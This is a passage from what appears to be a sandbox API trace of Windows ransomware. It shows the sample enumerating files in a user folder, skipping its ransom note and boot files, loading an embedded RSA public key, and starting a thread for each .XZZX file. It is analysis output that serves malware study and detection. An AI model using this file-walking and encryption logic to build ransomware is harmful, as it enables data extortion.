HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0187.052] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0187.052] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*" [0187.052] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdea18 [0187.052] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="9Y_m-oVB2IyYX" [0187.053] lstrcpyW (in: lpString1=0x17a5a4, lpString2="9Y_m-oVB2IyYX" | out: lpString1="9Y_m-oVB2IyYX") returned="9Y_m-oVB2IyYX" [0187.053] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0187.053] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0187.053] lstrcmpW (lpString1="06C3ECFB13862898AA23710517BB0CE0.XZZX", lpString2="..") returned 1 [0187.053] lstrcmpW (lpString1="06C3ECFB13862898AA23710517BB0CE0.XZZX", lpString2=".") returned 1 [0187.053] StrStrW (lpFirst="06C3ECFB13862898AA23710517BB0CE0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0187.053] StrStrW (lpFirst="06C3ECFB13862898AA23710517BB0CE0.XZZX", lpSrch="ntldr") returned 0x0 [0187.053] StrStrW (lpFirst="06C3ECFB13862898AA23710517BB0CE0.XZZX", lpSrch="NTLDR") returned 0x0 [0187.053] StrStrW (lpFirst="06C3ECFB13862898AA23710517BB0CE0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0187.053] StrStrW (lpFirst="06C3ECFB13862898AA23710517BB0CE0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0187.053] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0187.053] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") [0187.053] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0187.053] lstrcpyW (in: lpString1=0x17addc, lpString2="06C3ECFB13862898AA23710517BB0CE0.XZZX" | out: lpString1="06C3ECFB13862898AA23710517BB0CE0.XZZX") returned="06C3ECFB13862898AA23710517BB0CE0.XZZX" [0187.053] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0187.053] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc2c [0187.054] Sleep (dwMilliseconds=0x96) [0187.205] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0187.205] lstrcmpW (lpString1="38DC595E3788A5BA7503B1493BA98A02.XZZX", lpString2="..") returned 1 [0187.205] lstrcmpW (lpString1="38DC595E3788A5BA7503B1493BA98A02.XZZX", lpString2=".") returned 1 [0187.206] StrStrW (lpFirst="38DC595E3788A5BA7503B1493BA98A02.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0187.206] StrStrW (lpFirst="38DC595E3788A5BA7503B1493BA98A02.XZZX", lpSrch="ntldr") returned 0x0 [0187.206] StrStrW (lpFirst="38DC595E3788A5BA7503B1493BA98A02.XZZX", lpSrch="NTLDR") returned 0x0 [0187.206] StrStrW (lpFirst="38DC595E3788A5BA7503B1493BA98A02.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0187.206] StrStrW (lpFirst="38DC595E3788A5BA7503B1493BA98A02.XZZX", lpSrch="ntdetect.com") returned 0x0 [0187.206] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0187.206] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") [0187.206] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0187.206] lstrcpyW (in: lpString1=0x17addc, lpString2="38DC595E3788A5BA7503B1493BA98A02.XZZX" | out: lpString1="38DC595E3788A5BA7503B1493BA98A02.XZZX") returned="38DC595E3788A5BA7503B1493BA98A02.XZZX" [0187.206] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0187.206] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc30 [0187.207] Sleep (dwMilliseconds=0x96) [0187.361] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0187.361] lstrcmpW (lpString1="3C85A2C827B882D0AC42F6272BD96718.XZZX", lpString2="..") returned 1 [0187.361] lstrcmpW (lpString1="3C85A2C827B882D0AC42F6272BD96718.XZZX", lpString2=".") returned 1 [0187.361] StrStrW (lpFirst="3C85A2C827B882D0AC42F6272BD96718.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0187.361] StrStrW (lpFirst="3C85A2C827B882D0AC42F6272BD96718.XZZX", lpSrch="ntldr") returned 0x0 [0187.361] StrStrW (lpFirst="3C85A2C827B882D0AC42F6272BD96718.XZZX", lpSrch="NTLDR") returned 0x0 [0187.362] StrStrW (lpFirst="3C85A2C827B882D0AC42F6272BD96718.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0187.362] StrStrW (lpFirst="3C85A2C827B882D0AC42F6272BD96718.XZZX", lpSrch="ntdetect.com") returned 0x0 [0187.362] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0187.362] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") [0187.362] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0187.362] lstrcpyW (in: lpString1=0x17addc, lpString2="3C85A2C827B882D0AC42F6272BD96718.XZZX" | out: lpString1="3C85A2C827B882D0AC42F6272BD96718.XZZX") returned="3C85A2C827B882D0AC42F6272BD96718.XZZX" [0187.362] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0187.362] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc34 [0187.362] Sleep (dwMilliseconds=0x96) [0187.517] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0187.517] lstrcmpW (lpString1="64527B001382D7BF4D0A170017B7BC07.XZZX", lpString2="..") returned 1 [0187.517] lstrcmpW (lpString1="64527B001382D7BF4D0A170017B7BC07.XZZX", lpString2=".") returned 1 [0187.517] StrStrW (lpFirst="64527B001382D7BF4D0A170017B7BC07.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0187.517] StrStrW (lpFirst="64527B001382D7BF4D0A170017B7BC07.XZZX", lpSrch="ntldr") returned 0x0 [0187.517] StrStrW (lpFirst="64527B001382D7BF4D0A170017B7BC07.XZZX", lpSrch="NTLDR") returned 0x0 [0187.518] StrStrW (lpFirst="64527B001382D7BF4D0A170017B7BC07.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0187.518] StrStrW (lpFirst="64527B001382D7BF4D0A170017B7BC07.XZZX", lpSrch="ntdetect.com") returned 0x0 [0187.518] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0187.518] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") [0187.518] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0187.518] lstrcpyW (in: lpString1=0x17addc, lpString2="64527B001382D7BF4D0A170017B7BC07.XZZX" | out: lpString1="64527B001382D7BF4D0A170017B7BC07.XZZX") returned="64527B001382D7BF4D0A170017B7BC07.XZZX" [0187.518] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0187.518] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc38 [0187.518] Sleep (dwMilliseconds=0x96) [0187.673] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0187.673] lstrcmpW (lpString1="663067DE2A526ACA340DE0352E734F12.XZZX", lpString2="..") returned 1 [0187.673] lstrcmpW (lpString1="663067DE2A526ACA340DE0352E734F12.XZZX", lpString2=".") returned 1 [0187.673] StrStrW (lpFirst="663067DE2A526ACA340DE0352E734F12.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0187.673] StrStrW (lpFirst="663067DE2A526ACA340DE0352E734F12.XZZX", lpSrch="ntldr") returned 0x0 [0187.673] StrStrW (lpFirst="663067DE2A526ACA340DE0352E734F12.XZZX", lpSrch="NTLDR") returned 0x0 [0187.674] StrStrW (lpFirst="663067DE2A526ACA340DE0352E734F12.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0187.674] StrStrW (lpFirst="663067DE2A526ACA340DE0352E734F12.XZZX", lpSrch="ntdetect.com") returned 0x0 [0187.674] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0187.674] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") [0187.674] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0187.674] lstrcpyW (in: lpString1=0x17addc, lpString2="663067DE2A526ACA340DE0352E734F12.XZZX" | out: lpString1="663067DE2A526ACA340DE0352E734F12.XZZX") returned="663067DE2A526ACA340DE0352E734F12.XZZX" [0187.674] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0187.674] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc3c [0187.674] Sleep (dwMilliseconds=0x96) [0187.829] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0187.829] lstrcmpW (lpString1="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX", lpString2="..") returned 1 [0187.829] lstrcmpW (lpString1="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX", lpString2=".") returned 1 [0187.829] StrStrW (lpFirst="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0187.830] StrStrW (lpFirst="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX", lpSrch="ntldr") returned 0x0 [0187.830] StrStrW (lpFirst="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX", lpSrch="NTLDR") returned 0x0 [0187.830] StrStrW (lpFirst="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0187.830] StrStrW (lpFirst="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX", lpSrch="ntdetect.com") returned 0x0 [0187.830] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0187.830] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") [0187.830] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0187.830] lstrcpyW (in: lpString1=0x17addc, lpString2="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX" | out: lpString1="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX") returned="6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX" [0187.830] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0187.830] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc40 [0187.831] Sleep (dwMilliseconds=0x96) [0187.985] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0187.985] lstrcmpW (lpString1="83899D5A26F059DE25E7413F2B253E26.XZZX", lpString2="..") returned 1 [0187.985] lstrcmpW (lpString1="83899D5A26F059DE25E7413F2B253E26.XZZX", lpString2=".") returned 1 [0187.985] StrStrW (lpFirst="83899D5A26F059DE25E7413F2B253E26.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0187.985] StrStrW (lpFirst="83899D5A26F059DE25E7413F2B253E26.XZZX", lpSrch="ntldr") returned 0x0 [0187.985] StrStrW (lpFirst="83899D5A26F059DE25E7413F2B253E26.XZZX", lpSrch="NTLDR") returned 0x0 [0187.985] StrStrW (lpFirst="83899D5A26F059DE25E7413F2B253E26.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0187.986] StrStrW (lpFirst="83899D5A26F059DE25E7413F2B253E26.XZZX", lpSrch="ntdetect.com") returned 0x0 [0187.986] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0187.986] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") [0187.986] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0187.986] lstrcpyW (in: lpString1=0x17addc, lpString2="83899D5A26F059DE25E7413F2B253E26.XZZX" | out: lpString1="83899D5A26F059DE25E7413F2B253E26.XZZX") returned="83899D5A26F059DE25E7413F2B253E26.XZZX" [0187.986] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS 